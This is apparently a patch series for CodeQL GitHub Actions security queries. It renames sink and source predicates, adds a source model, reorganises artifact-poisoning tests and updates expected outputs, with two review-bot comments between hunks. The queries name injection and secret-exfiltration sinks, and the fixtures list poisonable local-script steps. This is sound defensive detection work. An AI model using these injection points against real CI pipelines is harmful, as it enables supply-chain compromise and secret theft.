@@ -40,13 +44,18 @@ predicate envToRunExpr(string var_name, Run run, string value) { var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 ) ) } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | @@ -131,18 +140,6 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo ) } -// predicate dISABLEDenvToOutputStoreStep( -// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -// ) { -// exists(Run run, string var_name, string content, string key, string value | -// writeToGitHubOutput(run, content) and -// extractVariableAndValue(content, key, value) and -// c = any(DataFlow::FieldContent ct | ct.getName() = key) and -// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and -// succ.asExpr() = run and -// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") -// ) -// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and 
@@ -180,7 +177,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since the may not exist an implicit env attribute + // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ec889f19205a..47cd38d47fab 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,9 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { - result = this.getLocation() - } + Location getLocation() { result = this.getLocation() } } /** @@ -119,10 +117,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { /** Gets a best-effort total ordering. */ int totalorder() { none() } - /** Gets the location of this callable. */ - Location getLocation() { - result = this.getLocation() - } + /** Gets the location of this callable. */ + Location getLocation() { result = this.getLocation() } } newtype TReturnKind = TNormalReturn() @@ -225,7 +221,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, StepsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and + madSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom 
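Review bot: `result = this.getLocation()` inside `DataFlowCall.getLocation()` appears to name the predicate being defined rather than the wrapped `Cfg::Node`, because a class declared with `instanceof` does not expose its base type's members through `this`; the predicate is then recursive with no base case and yields no location, and the one-line reformat in this hunk keeps that behaviour. `DataFlowCallable.getLocation()` in the next hunk has the same shape. If the intent is to delegate to the CFG node, `Location getLocation() { result = super.getLocation() }` (or `this.(Cfg::Node).getLocation()`) is the usual form for non-extending subtypes.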
@@ -242,7 +238,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, NeedsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + madSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -282,7 +278,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom or @@ -382,7 +378,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or - externallyDefinedStoreStep(node1, node2, c) or + madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index c13db5b81275..37f966668df6 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -46,7 +46,7 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { - ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + ArgumentInjectionFromMaDSink() { madSink(this, "argument-injection") } override string getCommand() { result = "unknown" } } 
diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index c2453cb1652e..8cd589fa9f8c 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -7,7 +7,7 @@ import codeql.actions.DataFlow class CodeInjectionSink extends DataFlow::Node { CodeInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "code-injection") + madSink(this, "code-injection") } } diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll index 8eda87f1cae5..59d523cd5827 100644 --- a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } + CommandInjectionSink() { madSink(this, "command-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index e81c6954d72f..41e72bc83885 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -44,7 +44,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { } class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { - EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } + EnvPathInjectionFromMaDSink() { madSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 869134215634..f5a3b5f89a8e 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
+++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -46,7 +46,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { } class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { - EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } + EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } } /** diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll index 80e3d93ee69a..ca0ac267131f 100644 --- a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll +++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class RequestForgerySink extends DataFlow::Node { - RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } + RequestForgerySink() { madSink(this, "request-forgery") } } /** diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 1886af435cfb..0317ab281990 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -6,7 +6,7 @@ private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { - SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") } + SecretExfiltrationSink() { madSink(this, "secret-exfiltration") } } /** diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 3ea9050c8322..b5ce78fe062a 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
@@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 5f1c54e70034..6da9acda9060 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } From 29d2b287c9e1d7538211d4dfaadc5174351ceef3 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:14:39 +0200 Subject: [PATCH 405/707] tests: Organize tests --- .../security/ArtifactPoisoningQuery.qll | 2 + ...logs_gh-action-get-changed-files.model.yml | 10 + .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 247 ++++++++++-------- .../.github/workflows/artifactpoisoning1.yml | 61 ----- .../.github/workflows/artifactpoisoning3.yml} | 0 .../.github/workflows/artifactpoisoning4.yml} | 0 .../.github/workflows/artifactpoisoning5.yml | 23 ++ .../.github/workflows/artifactpoisoning6.yml | 30 +++ .../.github/workflows/artifactpoisoning7.yml | 24 +- .../.github/workflows/artifactpoisoning8.yml | 22 ++ .../CWE-094/CodeInjectionCritical.expected | 45 +++- .../CWE-094/CodeInjectionMedium.expected | 38 ++- .../.github/workflows/artifactpoisoning12.yml | 2 +- ...poisoning8.yml => artifactpoisoning71.yml} | 0 .../ArtifactPoisoningCritical.expected | 14 +- .../CWE-829/ArtifactPoisoningMedium.expected | 10 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- .../UntrustedCheckoutCritical.expected | 12 +- 19 files changed, 318 insertions(+), 228 deletions(-) create mode 100644 ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning61.yml => CWE-094/.github/workflows/artifactpoisoning3.yml} (100%) rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning7.yml => CWE-094/.github/workflows/artifactpoisoning4.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning8.yml => artifactpoisoning71.yml} (100%) 
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
index dd409bdbae28..541498ae574c 100644
--- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
@@ -254,6 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node {
 poisonable.(UsesStep) = this.asExpr() ) and (
+ // Check if the poisonable step is a local script execution step
+ // and the path of the command or script matches the path of the downloaded artifact
 not poisonable instanceof LocalScriptExecutionRunStep or poisonable .(LocalScriptExecutionRunStep)
diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
new file mode 100644
index 000000000000..a437dc2c4f29
--- /dev/null
+++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"]
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.added", "PR changed files", "manual"]
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.modified", "PR changed files", "manual"]
+ - ["lots0logs/gh-action-get-changed-files", "*", "output.renamed", "PR changed files", "manual"]
+
diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected
index 55105c39bdfa..96dca7f0308f 100644
--- a/ql/test/library-tests/poisonable_steps.expected
+++ b/ql/test/library-tests/poisonable_steps.expected
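Review bot: The two comment lines added inside `ArtifactPoisoningSink` describe only the second disjunct, but the condition they sit above begins with `not poisonable instanceof LocalScriptExecutionRunStep or ...`, so a reader skimming the comment would miss that every poisonable step that is not a local script execution passes unconditionally. Rewording to `// Either the poisonable step is not a local script execution, or it is one whose command/script path matches the path of the downloaded artifact` keeps both arms in view. The enclosing predicate starts and ends outside this hunk.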
@@ -27,4 +27,5 @@ | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 08f9136f2e50..62b04344f392 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -74,7 +74,8 @@ steps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -131,7 +132,8 @@ runSteps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -224,7 +226,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -377,138 +380,142 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | 